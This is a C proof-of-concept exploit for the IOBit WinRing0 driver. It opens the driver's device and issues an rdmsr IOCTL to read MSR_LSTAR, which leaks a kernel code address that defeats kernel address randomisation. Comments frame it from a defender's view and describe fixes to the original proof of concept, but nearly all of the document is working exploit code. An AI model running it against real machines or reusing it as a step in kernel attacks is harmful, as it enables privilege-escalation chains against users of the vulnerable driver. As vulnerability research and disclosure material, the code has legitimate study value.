#include <windows.h>
#include <stdio.h>
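typedef unsigned long long QWORD; // DWORD64

// Exploit Data
// Index of the MSR the PoC asks the driver to read. It is only ever copied
// into the IOCTL input buffer, so it is a read-only constant rather than a
// writable global.
static const DWORD IA32_MSR_LSTAR = 0xC0000082; // MSR_LSTAR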

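 int main(int argc, char* argv[]) {
  (void)argc;
  (void)argv;

  /*
   * Opens the IOBit WinRing0 device and issues its rdmsr IOCTL for
   * MSR_LSTAR, printing the 8-byte value the driver returns. The device
   * name and IOCTL code are taken verbatim from the original PoC.
   *
   * From a defender's view the observable artifact is a user-mode process
   * opening the device name below; per the original comment the value that
   * comes back is a kernel code address (nt!KiSystemCall64Shadow), i.e. the
   * driver discloses kernel layout to whoever can open its device.
   *
   * Fixes over the original: DeviceIoControl's BOOL result and the byte
   * count are checked before the output is dereferenced, the device handle
   * is closed on every path, and the two fixed-address PAGE_EXECUTE_READWRITE
   * allocations are replaced by plain stack buffers (the IOCTL only needs
   * 4 bytes in and 8 bytes out; no executable memory is required).
   *
   * Returns 0 on success, 1 on any failure (via ExitProcess).
   */
  HANDLE hDriver = CreateFileW(L"\\\\.\\IOBIT_WinRing0_1_3_0", GENERIC_READ | GENERIC_WRITE, 0,
      NULL, OPEN_EXISTING, 0, NULL); // Get a handle to the driver
  if (hDriver == INVALID_HANDLE_VALUE) {
    printf("[!!!] Unable to find driver\n");
    ExitProcess(1);
  }
  printf("[i] Found driver\n");

  DWORD msrIndex = IA32_MSR_LSTAR; // 4-byte input buffer: MSR number
  QWORD msrValue = 0;              // 8-byte output buffer: MSR contents
  DWORD dwIoctl = 0x9C402084;      // rdmsr IOCTL
  printf("[i] Sending IOCTL 0x%lX\n", dwIoctl);

  // nInBufferSize and nOutBufferSize are in bytes (4 and 8 are the minimum).
  DWORD dwBytesOut = 0;
  BOOL ok = DeviceIoControl(hDriver, dwIoctl, &msrIndex, sizeof msrIndex,
                            &msrValue, sizeof msrValue, &dwBytesOut, NULL);

  int rc = 0;
  if (!ok || dwBytesOut < sizeof msrValue) {
    // Either the call failed or the driver returned fewer bytes than a full
    // MSR; printing msrValue here would show uninitialised/partial data.
    printf("[!!!] DeviceIoControl failed (error %lu, %lu bytes returned)\n",
           GetLastError(), dwBytesOut);
    rc = 1;
  } else {
    printf("MSR 0xC0000082: %I64X - (nt!KiSystemCall64Shadow)\n", msrValue);
  }

  CloseHandle(hDriver);
  ExitProcess(rc);
}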